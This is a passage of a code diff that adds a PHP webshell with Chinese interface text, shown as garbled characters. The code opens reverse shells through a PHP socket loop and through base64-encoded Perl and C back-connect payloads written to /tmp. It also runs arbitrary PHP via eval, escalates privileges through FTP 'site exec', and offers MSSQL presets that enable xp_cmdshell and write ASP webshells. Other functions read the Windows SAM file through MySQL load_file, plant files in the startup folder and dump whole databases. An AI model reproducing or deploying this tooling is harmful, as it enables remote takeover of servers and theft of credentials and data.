+	 		$sendbuf = "USER ".$_POST['user']."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: $sendbuf <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = "PASS ".$_POST['password']."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: $sendbuf <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = $deldomain;
+	 		@fputs($sock, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: $sendbuf <br>";
+	 		$recvbuf = @fgets($sock, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		@fclose($exp);
+		}
+		@fclose($sock);
+		echo '</div>';
+	}
+}
+//��������
+function backconn()
+{
+$ty=$_GET['ty'];
+if($ty=='socket'){
+@set_time_limit(0);
+$system=strtoupper(substr(PHP_OS, 0, 3));
+if(!extension_loaded('sockets'))
+{
+if($system == 'WIN'){@dl('php_sockets.dll') or die("Can't load socket");}
+else{@dl('sockets.so') or die("Can't load socket");}
+}
+if(isset($_POST['host']) && isset($_POST['port']))
+{
+$host = $_POST['host'];
+$port = $_POST['port'];
+}else{
+print<<<END
+<div class="actall"><form method=post action="?s=dd&ty=socket">
+<br>��������:<input type="radio" name=info value="linux">Linux <input type="radio" name=info value="win" checked>Windows<br><br>
+������<input type=text name=host value=""><br>
+�˿ڣ�<input type=text name=port value="1120"><br><br>
+<input class="bt" type=submit name=submit value="��������"><br><br></form></div>
+END;
+}
+if($system=="WIN"){$env=array('path' => 'c:\\windows\\system32');}
+else{$env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');}
+$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"),);
+$host=gethostbyname($host);
+$proto=getprotobyname("tcp");
+if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){die("Socket����ʧ��");}
+if(($ret=socket_connect($sock,$host,$port))<0){die("����ʧ��");}
+else{
+$message=" PHP��������\n";
+socket_write($sock,$message,strlen($message));
+$cwd=str_replace('\\','/',dirname(__FILE__));
+while($cmd=socket_read($sock,65535,$proto))
+{
+if(trim(strtolower($cmd))=="exit"){socket_write($sock,"Bye\n"); exit;}
+else{
+$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
+if (is_resource($process)){
+fwrite($pipes[0], $cmd);
+fclose($pipes[0]);
+$msg=stream_get_contents($pipes[1]);
+socket_write($sock,$msg,strlen($msg));
+fclose($pipes[1]);
+$msg=stream_get_contents($pipes[2]);
+socket_write($sock,$msg,strlen($msg));
+$return_value = proc_close($process);
+}
+}
+}
+}
+}
+elseif($ty=='linux'){
+$yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR');
+$yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666';
+print<<<END
+<div class="actall"><form method="POST" name="kform" id="kform" action="?s=dd&ty=linux">
+<br>��ĵ�ַ <input type="text" name="yourip" value="{$yourip}" style="width:400px"><br>
+���Ӷ˿� <input type="text" name="yourport" value="12666" style="width:400px"><br>
+ִ�з�ʽ <select name="use"><option value="perl">perl</option><option value="c">c</option></select>&nbsp;&nbsp;
+<input type="submit" value="��������" style="width:80px;"><br><br><br></form></div>
+END;
+if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))
+{
+echo '<div class="actall">';
+if($_POST['use'] == 'perl')
+{
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+echo File_Write('/tmp/yoco_bc',base64_decode($back_connect_pl),'wb') ? '����/tmp/yoco_bc�ɹ�<br>' : '����/tmp/yoco_bcʧ��<br>';
+$perlpath = Exec_Run('which perl');
+$perlpath = $perlpath ? chop($perlpath) : 'perl';
+echo Exec_Run($perlpath.' /tmp/yoco_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'ִ������ʧ��';
+}
+if($_POST['use'] == 'c')
+{
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+echo File_Write('/tmp/yoco_bc.c',base64_decode($back_connect_c),'wb') ? '����/tmp/yoco_bc.c�ɹ�<br>' : '����/tmp/yoco_bc.cʧ��<br>';
+$res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
+@unlink('/tmp/yoco.c');
+echo Exec_Run('/tmp/yoco_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'ִ������ʧ��';
+}
+echo '<br>����Գ������Ӷ˿� (nc -l -n -v -p '.$_POST['yourport'].') </div>';
+}
+return true;
+}else{
+print<<<END
+<div class="actall"><pre>
+<br><a href="?s=dd&ty=linux"> [ C/Perl ���� - Linux ] </a><br><br>
+<h5>����������linux��Ȩ�еķ���cmd���ӡ�<br>
+ԭ���ǽ��������ӹ��ܵ�perl�ű�����C����д��/tmp�ļ��в�����<br>
+��php����������ִ�к��������ܵ��·���ʧ��<br>
+����������nc��������˿ڣ�����nc -vv -l -p 12666</h5><br><br><br>
+<a href="?s=dd&ty=socket"> [ Socket���� - Windows ] </a><br><br>
+<h5>PHPʹ��Socket����cmdshell�������ӡ�Webshell���ڷ���������ΪWindowsϵͳ<br>
+Ŀǰû�з����з����������Socket���������������ƣ���php_sockets��������Ϊopen/enable<br>
+����ͨ��phpinfo()�����鿴�������Ƿ�����php_socket����<br>
+Socket�������ӵ���;���ڵ�PHP�����˲�������ִ�к����������ִ��<br>
+��ҪäĿ���ӣ�������ɷ�������������Դ�ľ������غ��<br>
+������������nc.exe�����˿ڣ�����nc -vv -l -p 5555<br></h5>
+</pre></div>
+END;
+}
+}
+//evalִ��php����
+function phpcode()
+{
+print<<<END
+<div class="actall"><h5>����php����:<h5></div>
+<form action="?s=ff" method="POST">
+<div class="actall"><textarea name="phpcode" rows="20" cols="80">phpinfo();/*print_r(apache_get_modules());*/</textarea></div><br />
+<div><input class="bt" type="submit" value="EVALִ��"></div><br></form>
+END;
+$phpcode = $_POST['phpcode'];
+$phpcode = trim($phpcode);
+if($phpcode){
+if(!preg_match('#<\?#si',$phpcode)){$phpcode = "<?php\n\n{$phpcode}\n\n?>";}
+eval("?".">$phpcode<?php ");
+echo '<br><br>';
+}
+return false;
+}
+//�������ݿ�����
+function otherdb(){
+$db = isset($_GET['db']) ? $_GET['db'] : 'ms';
+print<<<END
+<form method="POST" name="dbform" id="dbform" action="?s=gg&db={$db}" enctype="multipart/form-data">
+<div class="actall">
+<a href="?s=gg&db=ms"> &nbsp; MSSQL &nbsp;</a>
+<a href="?s=gg&db=ora"> &nbsp; Oracle &nbsp;</a>
+<a href="?s=gg&db=ifx"> &nbsp; InforMix &nbsp;</a>
+<a href="?s=gg&db=fb"> &nbsp;  FireBird &nbsp;</a>
+<a href="?s=gg&db=db2">&nbsp; DB2 &nbsp;</a></div></form>
+END;
+if ($db=="ms"){
+$mshost = isset($_POST['mshost']) ? $_POST['mshost']:'localhost';
+$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : 'sa';
+$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '';
+$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
+$msaction = isset($_POST['action']) ? $_POST['action'] : '';
+$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
+$msquery = stripslashes($msquery);
+print<<<END
+<div class="actall">
+<form method="POST" name="msform" action="?s=gg&db=ms">
+Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
+User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
+Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
+Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br>
+<script language="javascript">
+function msFull(i){
+	Str = new Array(11);
+	Str[0] = "";
+	Str[1] = "select @@version;";
+	Str[2] = "select name from sysdatabases;";
+	Str[3] = "select name from sysobject where type='U';";
+	Str[4] = "select name from syscolumns where id=Object_Id('table_name');";
+	Str[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
+	Str[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
+	Str[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
+	Str[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
+	Str[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
+	Str[10] = "Exec master.dbo.xp_cmdshell 'net user';";
+	Str[11] = "Declare @s  int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
+	Str[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
+	msform.mssql.value = Str[i];
+	return true;
+}
+</script>
+<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
+<select onchange="return msFull(options[selectedIndex].value)">
+	<option value="0" selected>ִ������</option>
+	<option value="1">��ʾ�汾</option>
+	<option value="2">���ݿ�</option>
+	<option value="3">����</option>
+	<option value="4">�ֶ�</option>
+	<option value="5">sp_oacreate</option>
+	<option value="6">xp_cmdshell</option>
+	<option value="7">xp_cmdshell(2005)</option>
+	<option value="8">sp_oacreate(2005)</option>
+	<option value="9">��openrowset(2005)</option>
+	<option value="10">xp_cmdshell exec</option>
+	<option value="10">sp_oamethod exec</option>
+	<option value="11">sp_makewebtask</option>
+</select>
+<input type="hidden" name="action" value="msquery">
+<input class="bt" type="submit" value="Query"></form></div>
+END;
+if ($msaction == 'msquery'){
+$msconn= mssql_connect ($mshost , $msuser, $mspass);  
+mssql_select_db($msdbname,$msconn) or die("connect error :" .mssql_get_last_message());
+$msresult = mssql_query($msquery) or die(mssql_get_last_message());
+echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">'."\n<tr>\n";
+for ($i=0; $i<mssql_num_fields($msresult); $i++)
+{echo '<td><b>'.mssql_field_name($msresult, $i)."</b></td>\n";}
+echo "</tr>\n";
+mssql_data_seek($result, 0);
+while ($msrow=mssql_fetch_row($msresult))
+{
+echo "<tr>\n";
+for ($i=0; $i<mssql_num_fields($msresult); $i++ )
+{echo '<td>'."$msrow[$i]".'</td>';}
+echo "</tr>\n";
+}
+echo "</table></font>";
+mssql_free_result($msresult);
+mssql_close();
+}
+}
+elseif ($db=="ora"){
+$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
+$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
+$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : 'root';
+$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '123456';
+$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
+$oraaction = isset($_POST['action']) ? $_POST['action'] : '';
+$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
+$oraquery = stripslashes($oraquery);
+print<<<END
+<form method="POST" name="oraform" action="?s=gg&db=ora">
+<div class="actall">
+Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
+Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
+User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
+Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
+SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br>
+<script language="javascript">
+function oraFull(i){
+Str = new Array(5);
+	Str[0] = ""; 
+	Str[1] = "select version();";
+	Str[2] = "SELECT NAME FROM V$DATABASE";
+	Str[3] = "select * From all_objects where object_type='TABLE'";
+	Str[4] = "select column_name from user_tab_columns where table_name='table1'";
+	oraform.orasql.value = Str[i];
+	return true;
+}
+</script>
+<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
+<select onchange="return oraFull(options[selectedIndex].value)">
+	<option value="0" selected>ִ������</option>
+	<option value="1">��ʾ�汾</option>
+	<option value="2">���ݿ�</option>
+	<option value="3">����</option>
+	<option value="4">�ֶ�</option>
+</select>
+<input type="hidden" name="action" value="myquery">
+<input class="bt" type="submit" value="Query"></div></form>
+END;
+if($oraaction == 'oraquery'){
+$oralink=OCILogon($orauser,$orapass,"(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST=$orahost)(PORT = $oraport))(CONNECT_DATA =(SID=$orasid)))") or die(ocierror()); 
+$oraresult=ociparse($oralink,$oraquery) or die(ocierror());
+$orarow=oci_fetch_row($oraresult);
+echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">'."\n<tr>\n";
+for ($i=0; $i<oci_num_fields($oraresult); $i++)
+{echo '<td><b>'.oci_field_name($oraresult, $i)."</b></td>\n";}
+echo "</tr>\n";
+ociresult($oraresult, 0);
+while ($orarow=ora_fetch_row($oraresult))
+{
+echo "<tr>\n";
+for ($i=0; $i<ora_num_fields($result); $i++ )
+{echo '<td>'."$orarow[$i]".'</td>';}
+echo "</tr>\n";
+}
+echo "</table></font>";
+oci_free_statement($oraresult);
+ocilogoff();
+}
+}
+elseif ($db == "ifx"){
+$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : 'root';
+$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '123456';
+$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
+$ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
+$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
+$ifxquery = stripslashes($ifxquery);
+print<<<END
+<form method="POST" name="ifxform" action="?s=gg&db=ifx">
+<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
+User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
+Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br>
+<script language="javascript">
+function ifxFull(i){
+Str = new Array(11);
+	Str[0] = "";
+	Str[1] = "select dbservername from sysobjects;";
+	Str[2] = "select name from sysdatabases;";
+	Str[3] = "select tabname from systables;";
+	Str[4] = "select colname from syscolumns where tabid=n;";
+	Str[5] = "select username,usertype,password from sysusers;";
+	ifxform.ifxsql.value = Str[i];
+	return true;
+}
+</script>
+<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
+<select onchange="return ifxFull(options[selectedIndex].value)">
+	<option value="0" selected>ִ������</option>
+	<option value="1">���ݿ����������</option>
+	<option value="1">���ݿ�</option>
+	<option value="2">����</option>
+	<option value="3">�ֶ�</option>
+	<option value="4">hashes</option>
+</select>
+<input type="hidden" name="action" value="ifxquery">
+<input class="bt" type="submit" value="Query"></div></form>
+END;
+if($ifxaction == 'ifxquery'){
+$ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
+$ifxresult = ifx_query($ifxquery,$ifxlink) or die (ifx_errormsg());
+$ifxrow=ifx_fetch_row($ifxresult);
+echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">'."\n<tr>\n";
+for($i=0; $i<ifx_num_fields($ifxresult); $i++)
+{echo '<td><b>'.ifx_fieldproperties($ifxresult)."</b></td>\n";}
+echo "</tr>\n";
+mysql_data_seek($ifxresult, 0);
+while ($ifxrow=ifx_fetch_row($ifxresult))
+{
+echo "<tr>\n";
+for ($i=0; $i<ifx_num_fields($ifxresult); $i++ )
+{echo '<td>'."$ifxrow[$i]".'</td>';}
+echo "</tr>\n";
+}
+echo "</table></font>";
+ifx_free_result($ifxresult);
+ifx_close();
+}
+}
+elseif ($db=="db2"){
+$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
+$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
+$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : 'root';
+$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '123456';
+$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
+$db2action = isset($_POST['action']) ? $_POST['action'] : '';
+$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
+$db2query = stripslashes($db2query);
+print<<<END
+<form method="POST" name="db2form" action="?s=gg&db=db2">
+<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
+Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
+User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
+Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
+Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br>
+<script language="javascript">
+function db2Full(i){
+Str = new Array(4);
+	Str[0] = "";
+	Str[1] = "select schemaname from syscat.schemata;";
+	Str[2] = "select name from sysibm.systables;";
+	Str[3] = "select colname from syscat.columns where tabname='table_name';";
+	Str[4] = "db2 get db cfg for db_name;";
+db2form.db2sql.value = Str[i];
+return true;
+}
+</script>
+<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
+<select onchange="return db2Full(options[selectedIndex].value)">
+	<option value="0" selected>ִ������</option>
+	<option value="1">���ݿ�</option>
+	<option value="1">����</option>
+	<option value="2">�ֶ�</option>
+	<option value="3">���ݿ�����</option>
+</select>
+<input type="hidden" name="action" value="db2query">
+<input class="bt" type="submit" value="Query"></div></form>
+END;
+if ($myaction == 'db2query'){
+$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
+$db2result = db2_exec($db2link,$db2query) or die(db2_stmt_errormsg());
+$db2row=db2_fetch_row($db2result);
+echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">'."\n<tr>\n";
+for ($i=0; $i<db2_num_fields($db2result); $i++)
+{echo '<td><b>'.db2_field_name($db2result)."</b></td>\n";}
+echo "</tr>\n";
+while ($db2row=db2_fetch_row($db2result))
+{
+echo "<tr>\n";
+for ($i=0; $i<db2_num_fields($db2result); $i++ )
+{echo '<td>'."$db2row[$i]".'</td>';}
+echo "</tr>\n";
+}
+echo "</table></font>";
+db2_free_result($db2result);
+db2_close();
+}
+}
+elseif($db == "fb") {
+$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
+$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
+$fbpath = str_replace("\\\\", "\\", $fbpath);
+$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : 'sysdba';
+$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : 'masterkey';
+$fbaction = isset($_POST['action']) ? $_POST['action'] : '';
+$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
+$fbquery = stripslashes($fbquery);
+print<<<END
+<form method="POST" name="fbform" action="?s=gg&db=fb">
+<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
+Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
+User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
+Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
+<script language="javascript">
+function fbFull(i){
+Str = new Array(5);
+	Str[0] = "";
+	Str[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
+	Str[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
+	Str[3] = "input 'D:\\createtable.sql';";
+	Str[4] = "shell netstat -an;";
+fbform.fbsql.value = Str[i];
+return true;
+}
+</script>
+<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
+<select onchange="return fbFull(options[selectedIndex].value)">
+	<option value="0" selected>ִ������</option>
+	<option value="1">����</option>
+	<option value="2">�ֶ�</option>
+	<option value="3">����sql</option>
+	<option value="4">shell</option>
+</select>
+<input type="hidden" name="action" value="fbquery">
+<input class="bt" type="submit" value="Query"></div></form>
+END;
+if($fbaction == 'fbquery'){
+$fblink = ibase_connect($fbhost.':'.$fbpath,$fbuser,$fbpass) or die(ibase_errmsg());
+$fbresult = ibase_query($fblink,$fbquery) or die(ibase_errmsg());
+echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">'."\n<tr>\n";
+for ($i=0; $i<ibase_num_fields($fbresult); $i++)
+{echo '<td><b>'.ibase_field_info($fbresult, $i)."</b></td>\n";}
+echo "</tr>\n";
+ibase_field_info($fbresult, 0);
+while ($fbrow=ibase_fetch_row($fbresult))
+{
+echo "<tr>\n";
+for ($i=0; $i<ibase_num_fields($fbresult); $i++ )
+{echo '<td>'."$fbrow[$i]".'</td>';}
+echo "</tr>\n";
+}
+echo "</table></font>";
+ibase_free_result($fbresult);
+ibase_close();
+}
+}
+}
+//MySqlִ��
+function Mysql_n()
+{
+	$MSG_BOX = '';
+	$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
+	if(isset($_POST['mhost']) && isset($_POST['muser']))
+	{
+		$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
+		if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
+		else $MSG_BOX = '����MYSQLʧ��';
+	}
+	$downfile = 'c:/windows/repair/sam';
+	if(!empty($_POST['downfile']))
+	{
+		$downfile = File_Str($_POST['downfile']);
+		$binpath = bin2hex($downfile);
+		$query = 'select load_file(0x'.$binpath.')';
+		if($result = @mysql_query($query,$conn))
+		{
+			$k = 0; $downcode = '';
+			while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
+			$filedown = basename($downfile);
+			if(!$filedown) $filedown = 'silic.tmp';
+			$array = explode('.', $filedown);
+			$arrayend = array_pop($array);
+			header('Content-type: application/x-'.$arrayend);
+			header('Content-Disposition: attachment; filename='.$filedown);
+			header('Content-Length: '.strlen($downcode));
+			echo $downcode;
+			exit;
+		}
+		else $MSG_BOX = '�����ļ�ʧ��';
+	}
+	$o = isset($_GET['o']) ? $_GET['o'] : '';
+	Root_CSS();
+print<<<END
+<form method="POST" name="nform" id="nform" action="?s=n&o={$o}" enctype="multipart/form-data">
+<center><div class="actall"><a href="?s=n">[MYSQLִ�����]</a>
+<a href="?s=n&o=tq">[MYSQL��Ȩ]</a>
+<a href="?s=n&o=tk">[MYSQL�ѿⱸ��]</a>
+<a href="?s=n&o=u">[MYSQL�ϴ��ļ�]</a>
+<a href="?s=n&o=d">[MYSQL�����ļ�]</a></div>
+<div class="actall">
+��ַ <input type="text" name="mhost" value="{$mhost}" style="width:110px">
+�˿� <input type="text" name="mport" value="{$mport}" style="width:110px">
+�û� <input type="text" name="muser" value="{$muser}" style="width:110px">
+���� <input type="text" name="mpass" value="{$mpass}" style="width:110px">
+���� <input type="text" name="mdata" value="{$mdata}" style="width:110px">
+</div>
+<div class="actall" style="height:220px;">
+END;
+if($o=='u')
+{
+	$uppath = 'C:/Documents and Settings/All Users/����ʼ���˵�/����/����/exp.vbs';
+	if(!empty($_POST['uppath']))
+	{
+		$uppath = $_POST['uppath'];
+		$query = 'Create TABLE a (cmd text NOT NULL);';
+		if(@mysql_query($query,$conn))
+		{
+			if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
+			else{$tmp = File_Str(dirname(__FILE__)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
+			$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
+			if(@mysql_query($query,$conn))
+			{
+				$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
+				$MSG_BOX = @mysql_query($query,$conn) ? '�ϴ��ļ��ɹ�' : '�ϴ��ļ�ʧ��';
+			}
+			else $MSG_BOX = '������ʱ��ʧ��';
+			@mysql_query('Drop TABLE IF EXISTS a;',$conn);
+		}
+		else $MSG_BOX = '������ʱ��ʧ��';
+	}
+print<<<END
+<br><br>�ϴ�·�� <input type="text" name="uppath" value="{$uppath}" style="width:500px">
+<br><br>ѡ���ļ� <input type="file" name="upfile" style="width:500px;height:22px;">
+</div><div class="actall"><input type="submit" value="�ϴ�" style="width:80px;">
+END;
+}
+elseif($o=='d')
+{
+print<<<END
+<br><br><br>�����ļ� <input type="text" name="downfile" value="{$downfile}" style="width:500px">
+</div><div class="actall"><input type="submit" value="����" style="width:80px;">
+END;
+}elseif($o=='tk'){
+if($_POST['dump']=='dump'){
+$mysql_link=@mysql_connect($mhost,$muser,$mpass);
+mysql_select_db($mdata);
+mysql_query("SET NAMES gbk");
+$mysql="";
+$q1=mysql_query("show tables");
+while($t=mysql_fetch_array($q1)){
+  $table=$t[0];
+  $q2=mysql_query("show create table `$table`");
+  $sql=mysql_fetch_array($q2);
+  $mysql.=$sql['Create Table'].";\r\n\r\n";
+  $q3=mysql_query("select * from `$table`");
+  while($data=mysql_fetch_assoc($q3))
+    {
+    $keys=array_keys($data);
+    $keys=array_map('addslashes',$keys);
+    $keys=join('`,`',$keys);    
+    $keys="`".$keys."`";
+    $vals=array_values($data);
+    $vals=array_map('addslashes',$vals);
+    $vals=join("','",$vals);
+    $vals="'".$vals."'";
+    $mysql.="insert into `$table`($keys) values($vals);\r\n";
+    }
+  $mysql.="\r\n";
+}
+$filename=date("Y-m-d-GisA").".sql";
+$fp=fopen($filename,'w');
+fputs($fp,$mysql);
+fclose($fp);
+$tip="<br><center>���ݱ��ݳɹ�������������ݿ��ļ���[<a href=\"".$filename."\" title=\"�������\">".$filename."</a>]</center>";
+}else{$tip="��δ���ݣ���֤����������Ŀ¼��д";}
+print<<<END
+<div class="actall"><form method="post" action="?s=n&o=tk"><br>
+�����ñ����ܣ����ݿ������ɷ�����崻������ :-(<br><br>
+{$tip}<br><br>
+<input type="hidden" value="dump" name="dump" id="dump">
+<input type="submit" value="һ������" tilte="Submit" style="width:120px;height:64px;">
+</form><div>
+END;
+}elseif($o=='tq')
+{
+extract($_POST);
+extract($_GET);
+$post_sql = $post_sql ? $post_sql : "select state(\"net user\")";
+if($install){
